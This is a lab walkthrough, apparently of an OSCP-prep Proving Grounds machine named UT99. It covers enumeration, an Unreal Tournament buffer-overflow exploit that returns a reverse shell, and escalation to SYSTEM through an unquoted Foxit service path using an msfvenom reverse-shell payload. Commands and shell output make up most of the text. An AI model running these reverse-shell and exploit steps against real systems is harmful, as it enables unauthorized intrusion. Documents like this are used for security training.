Logo
Overview

PG: UT99 | Walkthrough

November 19, 2021
4 min read
PG/Machines Boot2Root OSCP/Prep writeups CVE/UnrealTournament CVE/FoxitReader

Enumeration

Start with Nmap scan as usual

Terminal window
$ nmap $ip -sVC -oN nmapInitial.txt -Pn


PORT     STATE SERVICE    VERSION
21/tcp   open  ftp        FileZilla ftpd
| ftp-syst:
|_  SYST: UNIX emulated by FileZilla
80/tcp   open  http       Apache httpd 2.4.16 (OpenSSL/1.0.1p PHP/5.6.12)
|_http-server-header: Apache/2.4.16 (Win32) OpenSSL/1.0.1p PHP/5.6.12
|_http-title: Index of /
| http-methods:
|_  Potentially risky methods: TRACE
443/tcp  open  ssl/http   Apache httpd 2.4.16 (OpenSSL/1.0.1p PHP/5.6.12)
|_http-title: Index of /
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_http-server-header: Apache/2.4.16 (Win32) OpenSSL/1.0.1p PHP/5.6.12
| http-methods:
|_  Potentially risky methods: TRACE
3306/tcp open  mysql      MySQL (unauthorized)
6666/tcp open  irc        InspIRCd
6667/tcp open  irc        InspIRCd
6668/tcp open  irc        InspIRCd
6669/tcp open  irc        InspIRCd
6689/tcp open  irc        InspIRCd
6692/tcp open  irc        InspIRCd
6699/tcp open  irc        InspIRCd
6779/tcp open  irc        InspIRCd
6788/tcp open  irc        InspIRCd
| irc-info:
|   server: irc.madcowz.localdomain
|   users: 3
|   servers: 1
|   chans: 1
|   lusers: 3
|   lservers: 0
|   source ident: nmap
|   source host: 192.168.49.240
|_  error: Closing link: (nmap@192.168.49.240) [Client exited]
6789/tcp open  irc        InspIRCd
6792/tcp open  irc        InspIRCd
6839/tcp open  irc        InspIRCd
6881/tcp open  irc        InspIRCd
| irc-info:
|   server: irc.madcowz.localdomain
|   users: 2
|   servers: 1
|   chans: 1
|   lusers: 3
|   lservers: 0
|   source ident: nmap
|   source host: 192.168.49.240
|_  error: Closing link: (nmap@192.168.49.240) [Client exited]
6901/tcp open  irc        InspIRCd
| irc-info:
|   server: irc.madcowz.localdomain
|   users: 4
|   servers: 1
|   chans: 1
|   lusers: 4
|   lservers: 0
|   source ident: nmap
|   source host: 192.168.49.240
|_  error: Closing link: (nmap@192.168.49.240) [Client exited]
6969/tcp open  irc        InspIRCd
7000/tcp open  irc        InspIRCd
7001/tcp open  tcpwrapped
7007/tcp open  irc        InspIRCd

irc

Terminal window
$ nc -vn $ip 6683
USER ran213eqdw123 0 * ran213eqdw123
NICK ran213eqdw123


ADMIN
:irc.madcowz.localdomain 256 ran213eqdw123 :Administrative info for irc.madcowz.localdomain
:irc.madcowz.localdomain 257 ran213eqdw123 :Name     - Fluffy Cow
:irc.madcowz.localdomain 258 ran213eqdw123 :Nickname - Fluffy
:irc.madcowz.localdomain 259 ran213eqdw123 :E-Mail   - fluffycow@localdomain


list
:irc.madcowz.localdomain 321 ran213eqdw123 Channel :Users Name
:irc.madcowz.localdomain 322 ran213eqdw123 #ut99 1 :[+nt] Fragging since UT99!  Unreal Tournament 99 Game Server UP!  IP: *THIS*  Port: 7778
:irc.madcowz.localdomain 323 ran213eqdw123 :End of channel list.

Exploitation

Initial Access

Unreal Tournament - Remote BOF(SEH) - Exploit-db

Terminal window
$ perl ut99-bof.pl 192.168.240.44 7778 192.168.49.240 80


$ rlwrap nc -nvlp 80
listening on [any] 80 ...
connect to [192.168.49.240] from (UNKNOWN) [192.168.240.44] 49236
Microsoft Windows [Version 6.0.6002]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.
C:\UnrealTournament\System>whoami
fluffy-pc\daisy

Privilege escalation

Foxit Reader 7.0.6.1126 - Unquoted Service Path Privilege Escalation - Exploit-db

Terminal window
C:\>cd ftp
cd ftp


C:\ftp>dir
dir
 Volume in drive C is HDD
 Volume Serial Number is DC74-4FCB


 Directory of C:\ftp


10/07/2015  05:21 AM    <DIR>          .
10/07/2015  05:21 AM    <DIR>          ..
10/07/2015  12:44 PM        35,984,520 FoxitReader706.1126_enu_Setup.exe
10/07/2015  03:46 AM        35,922,892 KB968930.msu
10/07/2015  12:45 PM       114,238,280 xampp-win32-5.6.12-0-VC11-installer.exe
               3 File(s)    186,145,692 bytes
               2 Dir(s)  13,053,009,920 bytes free

get information about the service

Terminal window
C:\UnrealTournament\System>sc qc FoxitCloudUpdateService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: FoxitCloudUpdateService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Foxit Cloud Safe Update Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

find writable directory from its path

Terminal window
C:\Program Files (x86)\Foxit Software\Foxit Reader>echo test >> test.txt
echo test >> test.txt


C:\Program Files (x86)\Foxit Software\Foxit Reader>type test.txt
type test.txt
test

Create binary Foxit.exe , put it in C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit.exe

Terminal window
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.240 LPORT=80 -f exe -o Foxit.exe                                                                    130 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: Foxit.exe

Since the service is set to auto start, we will restart the target machine. ( start netcat listener as well)

Terminal window
C:\Program Files (x86)\Foxit Software\Foxit Reader>shutdown.exe -r -f -t 1
Terminal window
$ nc -nvlp 80
listening on [any] 80 ...
connect to [192.168.49.240] from (UNKNOWN) [192.168.240.44] 49155
Microsoft Windows [Version 6.0.6002]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.
C:\Windows\system32>
C:\Windows\system32>whoami
whoami
nt authority\system